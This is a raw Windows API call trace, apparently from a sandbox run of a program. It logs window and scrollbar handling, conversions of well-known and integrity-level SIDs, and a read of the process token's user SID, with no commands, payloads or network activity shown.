[0140.447] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.447] SysReAllocStringLen (in: pbstr=0x2acf388*="GET", psz="GET", len=0x3 | out: pbstr=0x2acf388*="GET") returned 1
[0140.447] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.448] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.448] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.448] SysReAllocStringLen (in: pbstr=0x2acf388*="GET", psz="GET", len=0x3 | out: pbstr=0x2acf388*="GET") returned 1
[0140.489] FlatSB_SetScrollProp (param_1=0x501d8, index=0x200, newValue=0x0, param_4=1) returned 0
[0140.489] GetSysColor (nIndex=20) returned 0xffffff
[0140.489] FlatSB_SetScrollProp (param_1=0x501d8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0140.489] FlatSB_SetScrollInfo (param_1=0x501d8, code=0, psi=0x18dffe, fRedraw=1)
[0140.489] CallWindowProcA (lpPrevWndFunc=0x29a7038, hWnd=0x501d8, Msg=0x46, wParam=0x0, lParam=0x18defc) returned 0x0
[0140.493] GetTextExtentPoint32A (in: hdc=0x4101082e, lpString="0", c=1, psizl=0x18f284 | out: psizl=0x18f284) returned 1
[0140.494] IsIconic (hWnd=0x501d8) returned 0
[0140.494] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f284 | out: lpRect=0x18f284) returned 1
[0140.494] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.494] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.494] IsIconic (hWnd=0x501d8) returned 0
[0140.494] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f1cc | out: lpRect=0x18f1cc) returned 1
[0140.494] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.494] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.494] IsIconic (hWnd=0x501d8) returned 0
[0140.494] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.494] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.494] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.494] IsIconic (hWnd=0x501d8) returned 0
[0140.494] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.494] FlatSB_SetScrollProp (param_1=0x501d8, index=0x200, newValue=0x0, param_4=0) returned 0
[0140.494] GetSysColor (nIndex=20) returned 0xffffff
[0140.494] FlatSB_SetScrollProp (param_1=0x501d8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0140.494] FlatSB_SetScrollInfo (param_1=0x501d8, code=0, psi=0x18f1da, fRedraw=1) returned 0
[0140.494] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.494] IsIconic (hWnd=0x501d8) returned 0
[0140.494] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.494] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.494] IsIconic (hWnd=0x501d8) returned 0
[0140.494] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.494] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.494] IsIconic (hWnd=0x501d8) returned 0
[0140.495] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.495] FlatSB_SetScrollProp (param_1=0x501d8, index=0x100, newValue=0x0, param_4=0) returned 0
[0140.495] GetSysColor (nIndex=20) returned 0xffffff
[0140.495] FlatSB_SetScrollProp (param_1=0x501d8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0140.495] FlatSB_SetScrollInfo (param_1=0x501d8, code=1, psi=0x18f1da, fRedraw=1) returned 0
[0140.495] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.495] IsIconic (hWnd=0x501d8) returned 0
[0140.495] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.495] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.495] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.495] IsIconic (hWnd=0x501d8) returned 0
[0140.495] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f1cc | out: lpRect=0x18f1cc) returned 1
[0140.495] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.495] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.495] IsIconic (hWnd=0x501d8) returned 0
[0140.495] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.495] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.495] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.495] IsIconic (hWnd=0x501d8) returned 0
[0140.495] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.495] FlatSB_SetScrollProp (param_1=0x501d8, index=0x200, newValue=0x0, param_4=0) returned 0
[0140.495] GetSysColor (nIndex=20) returned 0xffffff
[0140.495] FlatSB_SetScrollProp (param_1=0x501d8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0140.495] FlatSB_SetScrollInfo (param_1=0x501d8, code=0, psi=0x18f1da, fRedraw=1) returned 0
[0140.496] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.496] IsIconic (hWnd=0x501d8) returned 0
[0140.496] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.496] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.496] IsIconic (hWnd=0x501d8) returned 0
[0140.496] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.496] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.496] IsIconic (hWnd=0x501d8) returned 0
[0140.496] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.496] FlatSB_SetScrollProp (param_1=0x501d8, index=0x100, newValue=0x0, param_4=0) returned 0
[0140.496] GetSysColor (nIndex=20) returned 0xffffff
[0140.496] FlatSB_SetScrollProp (param_1=0x501d8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0140.496] FlatSB_SetScrollInfo (param_1=0x501d8, code=1, psi=0x18f1da, fRedraw=1) returned 0
[0140.496] GetWindowLongA (hWnd=0x501d8, nIndex=-16) returned 116326400
[0140.496] IsIconic (hWnd=0x501d8) returned 0
[0140.496] GetClientRect (in: hWnd=0x501d8, lpRect=0x18f19c | out: lpRect=0x18f19c) returned 1
[0140.496] GetCurrentThreadId () returned 0x89c
[0140.497] ConvertSidToStringSidA () returned 0x1
[0140.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.497] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0140.497] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.497] LocalFree (hMem=0x5c2f90) returned 0x0
[0140.497] ConvertStringSidToSidA () returned 0x1
[0140.497] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2ac2914, pSourceSid=0x5c2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2ac2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.497] IsValidSid (pSid=0x2ac2914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.497] ConvertSidToStringSidA () returned 0x1
[0140.497] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.497] LocalFree (hMem=0x5c2f90) returned 0x0
[0140.497] ConvertStringSidToSidA () returned 0x1
[0140.497] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2ac702c, pSourceSid=0x5c2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2ac702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.497] IsValidSid (pSid=0x2ac702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.497] ConvertSidToStringSidA () returned 0x1
[0140.497] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.497] LocalFree (hMem=0x5c2f90) returned 0x0
[0140.497] ConvertStringSidToSidA () returned 0x1
[0140.497] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acf5a0, pSourceSid=0x5c2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2acf5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.498] IsValidSid (pSid=0x2acf5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0140.498] ConvertSidToStringSidA () returned 0x1
[0140.498] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.498] LocalFree (hMem=0x5c2f90) returned 0x0
[0140.498] ConvertStringSidToSidA () returned 0x1
[0140.498] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acf614, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.498] IsValidSid (pSid=0x2acf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0140.498] ConvertSidToStringSidA () returned 0x1
[0140.498] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.498] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.498] ConvertStringSidToSidA () returned 0x1
[0140.498] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acf688, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2acf688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0140.498] IsValidSid (pSid=0x2acf688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0140.498] ConvertSidToStringSidA () returned 0x1
[0140.498] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.498] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.498] ConvertStringSidToSidA () returned 0x1
[0140.498] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acf6fc, pSourceSid=0x5d6f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2acf6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0140.498] IsValidSid (pSid=0x2acf6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0140.498] ConvertSidToStringSidA () returned 0x1
[0140.498] LocalFree (hMem=0x5cc1c8) returned 0x0
[0140.498] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.498] ConvertStringSidToSidA () returned 0x1
[0140.498] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acf770, pSourceSid=0x5d6f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2acf770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0140.498] IsValidSid (pSid=0x2acf770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0140.498] ConvertSidToStringSidA () returned 0x1
[0140.498] LocalFree (hMem=0x5cc1c8) returned 0x0
[0140.498] LocalFree (hMem=0x5d6f70) returned 0x0
[0140.498] ConvertStringSidToSidA () returned 0x1
[0140.498] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acf7f8, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2acf7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0140.498] IsValidSid (pSid=0x2acf7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0140.498] ConvertSidToStringSidA () returned 0x1
[0140.498] LocalFree (hMem=0x5cc1c8) returned 0x0
[0140.499] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.499] ConvertStringSidToSidA () returned 0x1
[0140.499] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acf880, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2acf880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0140.499] IsValidSid (pSid=0x2acf880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0140.499] ConvertSidToStringSidA () returned 0x1
[0140.499] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.499] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.499] ConvertStringSidToSidA () returned 0x1
[0140.499] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acf90c, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2acf90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0140.499] IsValidSid (pSid=0x2acf90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0140.499] ConvertSidToStringSidA () returned 0x1
[0140.499] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.499] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.499] ConvertStringSidToSidA () returned 0x1
[0140.499] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acf998, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2acf998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0140.499] IsValidSid (pSid=0x2acf998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0140.499] ConvertSidToStringSidA () returned 0x1
[0140.499] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.499] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.499] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.499] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0140.499] GetCurrentThread () returned 0xfffffffe
[0140.499] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.499] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0140.499] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x18ea5c | out: TokenHandle=0x18ea5c*=0x29a3756) returned 0
[0140.500] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.500] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0140.500] GetCurrentProcess () returned 0xffffffff
[0140.500] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.500] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0140.500] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2acfa3c | out: TokenHandle=0x2acfa3c*=0x1d0) returned 1
[0140.500] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.500] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0140.500] MapGenericMask (in: AccessMask=0x18e8d4, GenericMapping=0x18e8d8 | out: AccessMask=0x18e8d4)
[0140.500] MapGenericMask (in: AccessMask=0x18ea08, GenericMapping=0x18ea0c | out: AccessMask=0x18ea08)
[0140.500] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0140.500] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0140.501] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ea1c | out: TokenInformation=0x0, ReturnLength=0x18ea1c) returned 0
[0140.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.501] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0140.501] GetLastError () returned 0x7a
[0140.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.501] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0140.501] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x5d0780, TokenInformationLength=0x24, ReturnLength=0x18ea40 | out: TokenInformation=0x5d0780, ReturnLength=0x18ea40) returned 1
[0140.501] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acfab0, pSourceSid=0x5d0788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2acfab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.501] IsValidSid (pSid=0x2acfab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.501] ConvertSidToStringSidA () returned 0x1
[0140.501] LocalFree (hMem=0x5c9e80) returned 0x0
[0140.501] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.501] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0140.501] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acfb34, pSourceSid=0x2acfab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2acfb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.501] IsValidSid (pSid=0x2acfb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.501] ConvertSidToStringSidA () returned 0x1
[0140.501] LocalFree (hMem=0x5c9e80) returned 0x0
[0140.501] IsValidSid (pSid=0x2acfb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0140.502] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.502] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0140.502] CloseHandle (hObject=0x1d0) returned 1
[0140.502] ConvertStringSidToSidA () returned 0x1
[0140.502] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acfa54, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2acfa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0140.502] IsValidSid (pSid=0x2acfa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0140.502] ConvertSidToStringSidA () returned 0x1
[0140.502] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.502] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.502] ConvertStringSidToSidA () returned 0x1
[0140.502] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acfae0, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2acfae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0140.502] IsValidSid (pSid=0x2acfae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0140.502] ConvertSidToStringSidA () returned 0x1
[0140.502] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.502] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.502] ConvertStringSidToSidA () returned 0x1
[0140.502] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acfbfc, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2acfbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0140.502] IsValidSid (pSid=0x2acfbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0140.502] ConvertSidToStringSidA () returned 0x1
[0140.502] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.502] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.502] ConvertStringSidToSidA () returned 0x1
[0140.502] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acfc8c, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2acfc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0140.502] IsValidSid (pSid=0x2acfc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0140.502] ConvertSidToStringSidA () returned 0x1
[0140.503] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.503] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.503] ConvertStringSidToSidA () returned 0x1
[0140.503] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2acfd1c, pSourceSid=0x5d6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2acfd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0140.503] IsValidSid (pSid=0x2acfd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0140.503] ConvertSidToStringSidA () returned 0x1
[0140.503] LocalFree (hMem=0x5d6f58) returned 0x0
[0140.503] LocalFree (hMem=0x5d6f40) returned 0x0
[0140.503] GetCurrentProcessId () returned 0x8a4
